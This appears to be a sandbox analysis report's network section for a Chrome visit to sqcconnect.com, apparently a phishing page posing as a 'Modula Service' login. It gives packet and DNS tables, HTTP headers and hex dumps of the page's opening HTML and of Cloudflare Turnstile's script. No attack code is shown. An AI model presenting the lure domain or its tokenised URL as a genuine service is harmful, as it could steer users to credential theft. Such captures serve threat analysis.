                                        Dec 17, 2024 15:46:23.495379925 CET4434973989.35.237.170192.168.2.17
                                        Dec 17, 2024 15:46:23.497049093 CET49739443192.168.2.1789.35.237.170
                                        Dec 17, 2024 15:46:24.194787979 CET4434973989.35.237.170192.168.2.17
                                        Dec 17, 2024 15:46:24.194850922 CET4434973989.35.237.170192.168.2.17
                                        Dec 17, 2024 15:46:24.194873095 CET4434973989.35.237.170192.168.2.17
                                        Dec 17, 2024 15:46:24.194905996 CET4434973989.35.237.170192.168.2.17
                                        Dec 17, 2024 15:46:24.195027113 CET49739443192.168.2.1789.35.237.170
                                        Dec 17, 2024 15:46:24.195060968 CET4434973989.35.237.170192.168.2.17
                                        Dec 17, 2024 15:46:24.195126057 CET49739443192.168.2.1789.35.237.170
                                        Dec 17, 2024 15:46:24.195883036 CET49739443192.168.2.1789.35.237.170
                                        Dec 17, 2024 15:46:24.195964098 CET4434973989.35.237.170192.168.2.17
                                        Dec 17, 2024 15:46:24.196259022 CET49739443192.168.2.1789.35.237.170
                                        Dec 17, 2024 15:46:26.433124065 CET4968280192.168.2.17192.229.211.108
                                        Dec 17, 2024 15:46:48.170300961 CET4974280192.168.2.17192.229.221.95
                                        Dec 17, 2024 15:46:48.290231943 CET8049742192.229.221.95192.168.2.17
                                        Dec 17, 2024 15:46:48.290397882 CET4974280192.168.2.17192.229.221.95
                                        Dec 17, 2024 15:46:49.790061951 CET49745443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:46:49.790174007 CET44349745172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:46:49.790286064 CET49745443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:46:49.790560961 CET49745443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:46:49.790596008 CET44349745172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:46:51.860263109 CET44349745172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:46:51.860673904 CET49745443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:46:51.860738039 CET44349745172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:46:51.861918926 CET44349745172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:46:51.862456083 CET49745443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:46:51.862680912 CET44349745172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:46:51.913809061 CET49745443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:47:01.477188110 CET44349745172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:47:01.477323055 CET44349745172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:47:01.477529049 CET49745443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:47:03.217082977 CET49745443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:47:03.217152119 CET44349745172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:47:32.347517967 CET44349691204.79.197.200192.168.2.17
                                        Dec 17, 2024 15:47:32.347693920 CET49691443192.168.2.17204.79.197.200
                                        Dec 17, 2024 15:47:49.855923891 CET49751443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:47:49.856026888 CET44349751172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:47:49.856340885 CET49751443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:47:49.856734991 CET49751443192.168.2.17172.217.19.228
                                        Dec 17, 2024 15:47:49.856798887 CET44349751172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:47:49.927416086 CET8049742192.229.221.95192.168.2.17
                                        Dec 17, 2024 15:47:49.927582979 CET4974280192.168.2.17192.229.221.95
                                        Dec 17, 2024 15:47:51.596204042 CET44349751172.217.19.228192.168.2.17
                                        Dec 17, 2024 15:47:51.643563032 CET49751443192.168.2.17172.217.19.228
                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 17, 2024 15:45:45.094322920 CET53541611.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:45.122555971 CET53580311.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:45.818043947 CET5231053192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:45.819281101 CET5334553192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:46.183280945 CET53533451.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:46.248156071 CET53523101.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:48.423679113 CET53565541.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:49.278498888 CET6036953192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:49.278695107 CET5225653192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:49.416122913 CET53522561.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:49.416172981 CET53603691.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:49.726082087 CET5557853192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:49.726272106 CET4931553192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:49.863928080 CET53493151.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:49.864479065 CET53555781.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:53.615072966 CET5179853192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:53.615334034 CET5612453192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:53.623677015 CET6128753192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:53.624011993 CET5250153192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:53.752300978 CET53517981.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:53.756966114 CET53561241.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:53.760986090 CET53612871.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:53.761404037 CET53525011.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:57.743995905 CET5077653192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:57.744232893 CET4976153192.168.2.171.1.1.1
                                        Dec 17, 2024 15:45:58.054945946 CET53497611.1.1.1192.168.2.17
                                        Dec 17, 2024 15:45:58.055151939 CET53507761.1.1.1192.168.2.17
                                        Dec 17, 2024 15:46:03.716267109 CET5832253192.168.2.171.1.1.1
                                        Dec 17, 2024 15:46:03.716403008 CET5715053192.168.2.171.1.1.1
                                        Dec 17, 2024 15:46:03.853351116 CET53583221.1.1.1192.168.2.17
                                        Dec 17, 2024 15:46:03.854494095 CET53571501.1.1.1192.168.2.17
                                        Dec 17, 2024 15:46:05.408540010 CET53629521.1.1.1192.168.2.17
                                        Dec 17, 2024 15:46:14.844964027 CET5156453192.168.2.171.1.1.1
                                        Dec 17, 2024 15:46:14.845144033 CET6378253192.168.2.171.1.1.1
                                        Dec 17, 2024 15:46:14.984025955 CET53515641.1.1.1192.168.2.17
                                        Dec 17, 2024 15:46:14.984973907 CET53637821.1.1.1192.168.2.17
                                        Dec 17, 2024 15:46:24.447455883 CET53516261.1.1.1192.168.2.17
                                        Dec 17, 2024 15:46:45.016191959 CET53581681.1.1.1192.168.2.17
                                        Dec 17, 2024 15:46:46.929513931 CET53559831.1.1.1192.168.2.17
                                        Dec 17, 2024 15:46:56.280389071 CET138138192.168.2.17192.168.2.255
                                        Dec 17, 2024 15:47:18.004971981 CET53512001.1.1.1192.168.2.17
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 17, 2024 15:45:45.818043947 CET192.168.2.171.1.1.10x6fa3Standard query (0)sqcconnect.comA (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:45.819281101 CET192.168.2.171.1.1.10xe73aStandard query (0)sqcconnect.com65IN (0x0001)false
                                        Dec 17, 2024 15:45:49.278498888 CET192.168.2.171.1.1.10xfdabStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:49.278695107 CET192.168.2.171.1.1.10x4df2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Dec 17, 2024 15:45:49.726082087 CET192.168.2.171.1.1.10xb7bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:49.726272106 CET192.168.2.171.1.1.10x823Standard query (0)www.google.com65IN (0x0001)false
                                        Dec 17, 2024 15:45:53.615072966 CET192.168.2.171.1.1.10xcc46Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:53.615334034 CET192.168.2.171.1.1.10x1f33Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Dec 17, 2024 15:45:53.623677015 CET192.168.2.171.1.1.10xd465Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:53.624011993 CET192.168.2.171.1.1.10x87fbStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Dec 17, 2024 15:45:57.743995905 CET192.168.2.171.1.1.10x56d3Standard query (0)api.faviconkit.comA (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:57.744232893 CET192.168.2.171.1.1.10xfc3cStandard query (0)api.faviconkit.com65IN (0x0001)false
                                        Dec 17, 2024 15:46:03.716267109 CET192.168.2.171.1.1.10xeb32Standard query (0)api.faviconkit.comA (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:46:03.716403008 CET192.168.2.171.1.1.10xc22bStandard query (0)api.faviconkit.com65IN (0x0001)false
                                        Dec 17, 2024 15:46:14.844964027 CET192.168.2.171.1.1.10x7dfeStandard query (0)sqcconnect.comA (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:46:14.845144033 CET192.168.2.171.1.1.10x3163Standard query (0)sqcconnect.com65IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 17, 2024 15:45:46.248156071 CET1.1.1.1192.168.2.170x6fa3No error (0)sqcconnect.com103.233.24.19A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:49.416122913 CET1.1.1.1192.168.2.170x4df2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Dec 17, 2024 15:45:49.416172981 CET1.1.1.1192.168.2.170xfdabNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:49.416172981 CET1.1.1.1192.168.2.170xfdabNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:49.863928080 CET1.1.1.1192.168.2.170x823No error (0)www.google.com65IN (0x0001)false
                                        Dec 17, 2024 15:45:49.864479065 CET1.1.1.1192.168.2.170xb7bNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:53.752300978 CET1.1.1.1192.168.2.170xcc46No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:53.752300978 CET1.1.1.1192.168.2.170xcc46No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:53.756966114 CET1.1.1.1192.168.2.170x1f33No error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Dec 17, 2024 15:45:53.760986090 CET1.1.1.1192.168.2.170xd465No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:53.760986090 CET1.1.1.1192.168.2.170xd465No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:45:53.761404037 CET1.1.1.1192.168.2.170x87fbNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                        Dec 17, 2024 15:45:58.054945946 CET1.1.1.1192.168.2.170xfc3cNo error (0)api.faviconkit.comfaviconkit.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                        Dec 17, 2024 15:45:58.055151939 CET1.1.1.1192.168.2.170x56d3No error (0)api.faviconkit.comfaviconkit.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                        Dec 17, 2024 15:45:58.055151939 CET1.1.1.1192.168.2.170x56d3No error (0)faviconkit.b-cdn.net89.35.237.170A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:46:03.853351116 CET1.1.1.1192.168.2.170xeb32No error (0)api.faviconkit.comfaviconkit.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                        Dec 17, 2024 15:46:03.853351116 CET1.1.1.1192.168.2.170xeb32No error (0)faviconkit.b-cdn.net89.35.237.170A (IP address)IN (0x0001)false
                                        Dec 17, 2024 15:46:03.854494095 CET1.1.1.1192.168.2.170xc22bNo error (0)api.faviconkit.comfaviconkit.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                        Dec 17, 2024 15:46:14.984025955 CET1.1.1.1192.168.2.170x7dfeNo error (0)sqcconnect.com103.233.24.19A (IP address)IN (0x0001)false
                                        • sqcconnect.com
                                        • https:
                                          • challenges.cloudflare.com
                                          • api.faviconkit.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.1749699103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:48 UTC768OUTGET /editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:49 UTC283INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:45:48 GMT
                                        Server: Apache
                                        Set-Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-17 14:45:49 UTC2588INData Raw: 61 31 30 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 3a 20 4d 6f 64 75 6c 61 20 53 65 72 76 69 63 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 66 61 76 69 63 6f 6e 6b 69 74 2e 63 6f 6d 2f 6d 6f 64 75 6c 61 2e 63 6f 6d 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 20 20 3c
                                        Data Ascii: a10<!DOCTYPE html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Access: Modula Service</title> <link href="https://api.faviconkit.com/modula.com" rel="shortcut icon"> <


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.1749700104.18.94.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:50 UTC542OUTGET /turnstile/v0/api.js HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://sqcconnect.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:51 UTC386INHTTP/1.1 302 Found
                                        Date: Tue, 17 Dec 2024 14:45:51 GMT
                                        Content-Length: 0
                                        Connection: close
                                        access-control-allow-origin: *
                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                        cross-origin-resource-policy: cross-origin
                                        location: /turnstile/v0/b/787bc399e22f/api.js
                                        Server: cloudflare
                                        CF-RAY: 8f37b302cc436a5f-EWR
                                        alt-svc: h3=":443"; ma=86400


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.1749702104.18.94.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:52 UTC557OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://sqcconnect.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:53 UTC471INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:45:53 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 47692
                                        Connection: close
                                        accept-ranges: bytes
                                        last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                        access-control-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        Server: cloudflare
                                        CF-RAY: 8f37b30f1ab3429e-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:45:53 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                        2024-12-17 14:45:53 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                        2024-12-17 14:45:53 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                        2024-12-17 14:45:53 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                        2024-12-17 14:45:53 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                        2024-12-17 14:45:53 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                        Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                        2024-12-17 14:45:53 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                        Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
